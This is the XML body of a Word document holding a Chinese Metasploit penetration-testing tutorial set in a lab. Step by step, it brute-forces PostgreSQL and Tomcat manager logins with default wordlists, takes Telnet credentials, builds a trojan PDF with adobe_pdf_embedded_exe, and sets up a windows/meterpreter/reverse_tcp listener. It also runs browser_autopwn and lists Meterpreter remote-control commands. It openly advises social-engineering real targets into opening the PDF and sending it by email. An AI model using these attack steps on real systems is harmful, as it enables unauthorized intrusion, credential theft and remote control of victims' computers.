    <w:p w14:paraId="4ADA5D1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PostgreSQL是一个自由的对象——关系数据库服务（数据库管理系统）。它在灵活的BSD-风格许可证下发行。当第一次启动msfconsole时，Kali中的Metasploit会创建名称为msf3的PostgreSQL数据库，并生成保存渗透测试数据所需的数据表。然后，使用名称为msf3的用户，自动连接到msf3数据库。所</w:t>
      </w:r>
      <w:r w:rsidRPr="005C53F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>以，攻击者可以利用这样的漏洞自动的连接到PostgreSQL数据库。本小节将介绍使用Metasploit的PostgreSQL扫描模块渗透攻击PostgreSQL数据库服务。渗透攻击PostgreSQL数据库服务的具体操作步骤如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363174A0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1）启动MSFCONSOLE。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2253E5F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2）搜索所有有效的PostgreSQL模块。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AAAF72" w14:textId="0B5638A1" w:rsidR="005C53F9" w:rsidRPr="005C53F9" w:rsidRDefault="002C2E6C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2E6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C731F6" wp14:editId="2F42E1DF">
            <wp:extent cx="5274310" cy="43160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530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以上信息显示了PostgreSQL所有相关的模块。此时可以选择相应的模块进行攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7893DAC2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3）使用PostgreSQL扫描模块。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3C37C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&gt; use auxiliary/scanner/postgres/postgres_login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30352F34" w14:textId="7515EB11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F45226" wp14:editId="6E9F6C98">
            <wp:extent cx="5274310" cy="4794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AA2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4）查看PostgreSQL模块的所有选项。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6D0A04" w14:textId="0E515CF5" w:rsidR="005C53F9" w:rsidRPr="005C53F9" w:rsidRDefault="002C2E6C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2E6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267DF05" wp14:editId="46E5CE2E">
            <wp:extent cx="5274310" cy="39909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FF7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以上信息显示了postgres_login模块中可配置的选项。根据用户的攻击情况，选择相应选项进行配置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C7358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5）使用RHOST（目标主机地址）选项设置目标系统（本例中为Metasploitable）。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795E459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开始之前先开启Metasploitable虚拟机环境，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A01310" w14:textId="0802F731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Metasploitable的IP地址为：192.168.</w:t>
      </w:r>
      <w:r w:rsidR="002C2E6C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>88</w:t>
      </w:r>
      <w:r w:rsidRPr="005C53F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidR="002C2E6C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>33</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08080DA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6）运行渗透攻击。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FF9189" w14:textId="43CA1941" w:rsidR="005C53F9" w:rsidRDefault="00CC2255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C225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6F7792B" wp14:editId="15C1B85A">
            <wp:extent cx="5274310" cy="4629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B42C" w14:textId="335C73AB" w:rsidR="00CC2255" w:rsidRPr="005C53F9" w:rsidRDefault="00CC2255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C225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CE29E1" wp14:editId="0DA407AB">
            <wp:extent cx="5274310" cy="40360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098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lastRenderedPageBreak/>
        <w:t>以上输出的信息是PostgreSQL渗透攻击的一个过程。测试到PostgreSQL数据库服务的用户名和密码分别是Postgres和Postgres。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9CD123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3. 渗透攻击Tomcat服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211010C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Tomcat服务器是一个免费的开放源代码的Web应用服务器。它可以运行在Linux和Windows等多个平台上。由于其性能稳定、扩展性好和免费等特点深受广大用户的喜爱。目前，互联网上绝大多数Java Web等应用都运行在Tomcat服务器上。Tomcat默认存在一个管理后台，默认的管理地址是</w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="005C53F9">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://IP或域名:端口/manager/html。</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005C53F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> 通过此后台，可以在不重启Tomcat服务的情况下方便地部署、启动、停止或卸载Web应用。但是如果配置不当的话就存在很大的安全隐患。攻击者利用这个漏洞，可以非常快速、轻松地入侵一台服务器。本小节将介绍渗透攻击Tomcat服务的方法。渗透攻击Tomcat服务的具体操作步骤如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006116D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1）启动MSFCONSOLE。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B6CAF8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2）搜索所有有效的Tomcat模块。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9545CB" w14:textId="5EFCE8DF" w:rsidR="005C53F9" w:rsidRDefault="00480FF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80FF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5B587F" wp14:editId="235DC28A">
            <wp:extent cx="5274310" cy="45548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A74" w14:textId="476A3493" w:rsidR="00480FF3" w:rsidRDefault="00480FF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80FF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12B78D1" wp14:editId="7821E564">
            <wp:extent cx="5274310" cy="50114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FFF" w14:textId="2824F4B6" w:rsidR="00480FF3" w:rsidRPr="005C53F9" w:rsidRDefault="00480FF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80FF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CCCC4C8" wp14:editId="50611DC7">
            <wp:extent cx="5274310" cy="48755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395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以上输出的信息显示了Tomcat服务的可用模块。现在用户可以选择易攻击的模块，进行渗透攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDC7C99" w14:textId="77777777" w:rsidR="005C53F9" w:rsidRPr="005C53F9" w:rsidRDefault="005C53F9" w:rsidP="005C53F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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使用Tomcat管理登录模块进行渗透攻击。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A4F54A" w14:textId="7452CB43" w:rsidR="005C53F9" w:rsidRPr="005C53F9" w:rsidRDefault="006E787C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E787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74CAECB" wp14:editId="62480FDA">
            <wp:extent cx="5274310" cy="46170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ED8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4）查看tomcat_mgr_login模块的有效选项。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3F1F20" w14:textId="29886C3D" w:rsidR="005C53F9" w:rsidRPr="005C53F9" w:rsidRDefault="006E787C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E787C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1AD3AF8" wp14:editId="25880263">
            <wp:extent cx="5274310" cy="44430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C26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以上输出的信息显示了tomcat_mgr_login模块中有效的选项。此时用户可以选择相应的模块，进行配置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC3B09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5）设置Pass_File选项。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005ACCD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auxiliary(tomcat_mgr_login) &gt; set PASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367196E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PASS_FILE =&gt; /usr/share/metasploit-framework/data/wordlists/ tomcat_mgr_default_pass.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB7996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以上输出的信息显示了指定密码文件的绝对路径。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2484D917" w14:textId="77777777" w:rsidR="005C53F9" w:rsidRPr="005C53F9" w:rsidRDefault="005C53F9" w:rsidP="005C53F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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设置User_File选项。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1789049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auxiliary(tomcat_mgr_login) &gt; set USER_FILE /usr/share/metasploit- framework/data/wordlists/tomcat_mgr_default_users.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E813E3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 xml:space="preserve">USER_FILE =&gt; /usr/share/metasploit-framework/data/wordlists/ </w:t>
      </w:r>
      <w:r w:rsidRPr="005C53F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>tomcat_mgr_default_users.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3D84E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以上输出的信息显示了指定用户名文件的绝对路径。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36204432" w14:textId="77777777" w:rsidR="005C53F9" w:rsidRPr="005C53F9" w:rsidRDefault="005C53F9" w:rsidP="005C53F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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使用RHOSTS选项设置目标系统（本例使用的是Metasploitable ）。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE50770" w14:textId="3E2E507A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35AFBE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输出的信息表示指定攻击的目标系统地址为192.168.122.117</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547F7B54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8）设置RPORT选项为8180。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AB2340" w14:textId="1A41B00E" w:rsidR="005C53F9" w:rsidRPr="005C53F9" w:rsidRDefault="0029157E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9157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0BBE48" wp14:editId="4A3A89BF">
            <wp:extent cx="5274310" cy="504634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310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以上信息设置了攻击目标系统的端口号为8180。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0588DCA4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9）运行渗透攻击。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E853AF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&gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0835240E" w14:textId="1FBCC740" w:rsidR="005C53F9" w:rsidRPr="005C53F9" w:rsidRDefault="0029157E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9157E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34A3BD" wp14:editId="773DB38C">
            <wp:extent cx="5274310" cy="45358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D146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4. 渗透攻击Telnet服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CD605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Telnet服务是一种“客户端/服务器”架构，在整个Telnet运行的流程架构中一定包括两个组件，分别是Telnet服务器和Telnet客户端。由于Telnet是使用明文的方式传输数据的，所以并不安全。这里就可以使用Metasplolit中的一个模块，可以破解出Telnet服务的用户名和密码。下面将介绍渗透攻击Telnet服务。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F6CC63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1）启动MSF终端。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0BF4C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2）使用telnet_version模块，并查看可配置的选项参数。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BAC8C5" w14:textId="4B05DD32" w:rsidR="005C53F9" w:rsidRDefault="00F808C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08C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2E80EC6" wp14:editId="0BE0D2DB">
            <wp:extent cx="5274310" cy="43097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580" w14:textId="16A54A05" w:rsidR="00F808C7" w:rsidRDefault="00F808C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08C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F635DB8" wp14:editId="31D0143E">
            <wp:extent cx="5274310" cy="50653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5DD5" w14:textId="119C50A7" w:rsidR="00F808C7" w:rsidRPr="005C53F9" w:rsidRDefault="00F808C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08C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4CEC74C" wp14:editId="43BF21C1">
            <wp:extent cx="5274310" cy="40735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E9CF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从输出的信息中，可以看到有四个必须配置选项。其中三个选项已经配置，现在配置RHOSTS选项。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687A8589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3）配置RHOSTS选项，并启动扫描。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F61C2B8" w14:textId="257E6F8E" w:rsidR="005C53F9" w:rsidRPr="005C53F9" w:rsidRDefault="00F808C7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08C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E8A6EBA" wp14:editId="7E5E415A">
            <wp:extent cx="5274310" cy="43688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E08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从以上输出的信息，仅看到一堆文本信息。但是在这些信息中可以看到，显示了Telnet的登录认证信息Login with msfadmin/msfadmin to get started。从这条信息中，可以得知目标主机Telnet服务的用户名和密码都为msfadmin。此时可以尝试登录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EDE3D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4）登录目标主机的Telnet服务。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324AF43E" w14:textId="63D697CF" w:rsidR="005C53F9" w:rsidRPr="005C53F9" w:rsidRDefault="00194A5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94A5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A8AC773" wp14:editId="1526CDEA">
            <wp:extent cx="5274310" cy="48018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C465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以上信息显示了登录Telnet服务的信息。在输出信息中看到[email protected]:~$提示符，则表示成功登录了Telnet服务。此时可以执行一些标准的Linux命令。例如，查看多个组的成员，执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E31050" w14:textId="0F2D705D" w:rsidR="005C53F9" w:rsidRPr="005C53F9" w:rsidRDefault="00194A53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94A5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D3C6697" wp14:editId="04102A79">
            <wp:extent cx="5274310" cy="45923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9AB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输出信息中显示了msfadmin用户的相关信息。其中，gid表示groups中第1个组账号为该用户的基本组，groups中的其他组账号为该用户的附加组。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073C3E2D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5. PDF文件攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D29F34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PDF是一种文件格式，该文件的使用比较广泛，并且容易传输。通常在工作中，用户都是从工作程序中打开了一个合法的PDF文档。当打开该文档时，该用户的主机就有可能被攻击。Metasploit提供了一个渗透攻击模块，可以来创建一个攻击载荷，通过传递该攻击载荷对目标系统进行渗透攻击。本小节将介绍创建PDF文件攻击载荷。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D65D337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一、创建PDF文件的具体操作步骤如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0664AD3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1）启动MSFCONSOLE。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F55CE5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2）搜索所有有效的PDF模块。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DA3573" w14:textId="6F72C693" w:rsidR="005C53F9" w:rsidRPr="005C53F9" w:rsidRDefault="00985686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8568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138DA1C" wp14:editId="32F16ED2">
            <wp:extent cx="5274310" cy="532701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60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以上输出信息显示了PDF所有可用的模块。此时可以选择相应模块进行配置，配置后方便进行攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF4E28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3）使用Adobe PDF Embedded EXE模块。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A24A46" w14:textId="41F2DC34" w:rsidR="005C53F9" w:rsidRDefault="00985686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8568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C1F4887" wp14:editId="5219C6F7">
            <wp:extent cx="5274310" cy="554736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9501" w14:textId="77777777" w:rsidR="00985686" w:rsidRPr="005C53F9" w:rsidRDefault="00985686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408505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4）查看adobe_pdf_embedded_exe模块有效的选项。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFF35E9" w14:textId="7652CE54" w:rsidR="005C53F9" w:rsidRPr="005C53F9" w:rsidRDefault="00985686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8568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1C270C3" wp14:editId="4606D70C">
            <wp:extent cx="5274310" cy="55562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DB5F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以上信息显示了adobe_pdf_embedded_exe模块所有可用的选项。此时配置必须的选项，然后进行渗透攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC3C06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5）设置用户想要生成的PDF文件名。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B8F0AF" w14:textId="7C01EA0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19D176" wp14:editId="2E728FC3">
            <wp:extent cx="5274310" cy="4095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2510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6）设置INFILENAME选项。为了利用，使用该选项指定用户访问的PDF文件位置。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F8DF8F" w14:textId="7A0961F2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857FF9" wp14:editId="763212D5">
            <wp:extent cx="5274310" cy="4559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377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7）运行exploit。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4D5A6D" w14:textId="3E9308DF" w:rsidR="005C53F9" w:rsidRPr="005C53F9" w:rsidRDefault="00F3450B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3450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9C8335F" wp14:editId="7FB5E229">
            <wp:extent cx="5274310" cy="28187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AFAF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输出的信息显示了evildocument.pdf文件已经生成，而且被保存到/root/.msf4/local目录中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636AAD3B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二、将PDF木马文件拷贝至靶机上（在真实环境下，可以社工一下，诱使目标打开PDF）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E84966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这里可以使用邮件发送。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8B1C27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使用metasploit开启监听，等待靶机上线。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C3CE1F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 启动msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C75FD2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 使用handler监听模块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB3A59F" w14:textId="7FB236DA" w:rsid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use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EF420D" w14:textId="537735EA" w:rsidR="00F3450B" w:rsidRPr="005C53F9" w:rsidRDefault="00F3450B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3450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F5C2DDF" wp14:editId="42CF20D2">
            <wp:extent cx="5274310" cy="447357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B6A8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3） 回弹一个tcp连接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489D0DA4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set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2138C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4） 设置监听IP地址（与之前设置木马文件的一致）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318BE8DC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set LHOST 192.168.122.185</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F710D19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 设置监听端口（与之前设置木马文件的一致，默认是4444）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F10555F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set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A7D67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6） 开启监听</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DB2224" w14:textId="033EAC71" w:rsidR="005C53F9" w:rsidRDefault="00F3450B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E</w:t>
      </w:r>
      <w:r w:rsidR="005C53F9" w:rsidRPr="005C53F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>xploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E60E49B" w14:textId="5DACF85E" w:rsidR="00F3450B" w:rsidRPr="005C53F9" w:rsidRDefault="00F3450B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3450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FC10404" wp14:editId="3DF608B1">
            <wp:extent cx="5274310" cy="35191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9E8B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三、靶机打开pdf文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0203E2D0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在靶机上利用Adobe Reader 9.0打开PDF文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A20EE65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四、获得Meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6698A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在攻击机Kali上，我们看到MSF控制台中获得了Meterpreter权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FBD241" w14:textId="77777777" w:rsidR="005C53F9" w:rsidRPr="005C53F9" w:rsidRDefault="005C53F9" w:rsidP="005C53F9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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6. 使用browser_autopwn模块渗透攻击浏览器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BDE44D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Browser Autopwn是由Metasploit提供的一个辅助模块。当访问一个Web页面时，它允许用户自动地攻击一个入侵主机。Browser Autopwn在攻击之前，会先进行指纹信息操作，这意味着它不会攻击Mozilla Firefox浏览器，而只会攻击系统自带的Internet Explorer 7浏览器。本小节将介绍browser_autopwn模块的使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EC2BE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加载browser_autopwn模块的具体操作步骤如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5CECC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1）启动MSFCONSOLE。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF52A92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~# msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6F0294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2）查询autopwn模块。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC28B94" w14:textId="4C31BC17" w:rsidR="005C53F9" w:rsidRPr="005C53F9" w:rsidRDefault="00222CA1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22CA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B099BA5" wp14:editId="1F8C607F">
            <wp:extent cx="5274310" cy="4802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A639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输出的信息显示了有两个autopwn模块。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3402C368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3）使用browser_autopwn模块。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690F396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&gt; use auxiliary/server/browser_autopwn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081B2A33" w14:textId="162EADFA" w:rsidR="005C53F9" w:rsidRPr="005C53F9" w:rsidRDefault="00222CA1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22CA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7D4FD14" wp14:editId="52E9C01E">
            <wp:extent cx="5274310" cy="5617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5F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执行以上命令后，没有任何信息输出。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373BB105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5）配置LHOST选项。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0802DE91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LHOST：本地网络地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71211AA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使用命令行 ip addr查看本机IP地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E090297" w14:textId="2A2E25D5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msf5 auxiliary(browser_autopwn) &gt; set LHOST 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="00222CA1">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>88</w:t>
      </w:r>
      <w:r w:rsidRPr="005C53F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidR="00222CA1">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC10E88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6）配置URIPATH选项。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B574E40" w14:textId="78791AD6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D89306" wp14:editId="62C69CC5">
            <wp:extent cx="5135880" cy="35052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B4BA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7）启用渗透攻击。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625F4EB6" w14:textId="7775364E" w:rsidR="005C53F9" w:rsidRPr="005C53F9" w:rsidRDefault="00222CA1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22CA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6B1477E" wp14:editId="682C2EE0">
            <wp:extent cx="5274310" cy="56686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81C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以上输出信息是一个漏洞攻击过程。此过程中输出的内容较多</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8F353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该会话是由客户端访问后产生的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FA65F7" w14:textId="17DA9987" w:rsidR="005C53F9" w:rsidRDefault="005C53F9" w:rsidP="005C53F9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="005C53F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>当渗透测试启动后，启动环境当中的win7虚拟机，在win7客户端的IE浏览器中输入</w:t>
      </w:r>
      <w:hyperlink r:id="rId56" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidR="0073161F" w:rsidRPr="0073161F">
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidR="0073161F" w:rsidRPr="0073161F">
          <w:t xml:space="preserve">http://192.168.122.185/filetypes  </w:t>
        </w:r>
        <w:r w:rsidR="0073161F" w:rsidRPr="0073161F">
          <w:t xml:space="preserve">                      </w:t>
        </w:r>
        <w:r w:rsidRPr="0073161F">
          <w:t>访问主机，将产生活跃的会话。</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="38408551" w14:textId="454FBAF3" w:rsidR="0073161F" w:rsidRDefault="0073161F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3161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4B865D5" wp14:editId="26F94EC6">
            <wp:extent cx="5274310" cy="60153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DEE3" w14:textId="5E38B075" w:rsidR="0073161F" w:rsidRDefault="0073161F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3161F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D7C44DC" wp14:editId="35941B5C">
            <wp:extent cx="5274310" cy="23133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539E" w14:textId="590C1A1A" w:rsidR="00FC4ABC" w:rsidRPr="0073161F" w:rsidRDefault="00FC4ABC" w:rsidP="005C53F9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in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00806831">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>旗舰版</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>安全性不错，此方法无法渗透。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B26716B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lastRenderedPageBreak/>
        <w:t>8）从第（7）步的输出结果中可以看到，成功建立的会话ID为1。为了激活此会话，执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDA1B06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msf auxiliary(browser_autopwn) &gt; sessions -i 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264B601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[*] Starting interaction with 1…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B31572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meterpreter &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554A993E" w14:textId="77777777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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9）查看能运行的Meterpreter命令列表。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E5CFC5" w14:textId="0575523E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164864" wp14:editId="2D00742B">
            <wp:extent cx="5274310" cy="45567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6FC9" w14:textId="6A4E4FF5" w:rsidR="005C53F9" w:rsidRPr="005C53F9" w:rsidRDefault="005C53F9" w:rsidP="005C53F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5C53F9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E3D2DB" wp14:editId="59DF65B9">
            <wp:extent cx="5274310" cy="2787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9760A" w14:textId="24448D63" w:rsidR="001717F1" w:rsidRDefault="001717F1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4F0C92E" w14:textId="5462EF15" w:rsidR="005C53F9" w:rsidRDefault="005C53F9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AACFBBC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是Metasploit框架中的一个杀手锏，通常作为利用漏洞后的攻击载荷所使用，攻击载荷在触发漏洞后能够返回给用户一个控制通道。当使用Armitage、MSFCLI或MSFCONSOLE获取到目标系统上的一个Meterpreter连接时，用户必须使用Meterpreter传递攻击载荷。MSFCONSOLE用于管理用户的会话，而Meterpreter则是攻击载荷和渗透攻击交互。本节将介绍Meterpreter的使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194236B6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Meterpreter包括的一些常见命令如下所示:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C39AEAC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help：查看帮助信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEECC0E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background：允许用户在后台Meterpreter会话。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4317318B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download：允许用户从入侵主机上下载文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD47018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upload：允许用户上传文件到入侵主机。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDD3750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execute：允许用户在入侵主机上执行命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749FD5CB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shell：允许用户在入侵主机上（仅是Windows主机）运行Windows shell命令。</w:t>
      </w:r>
    </w:p>
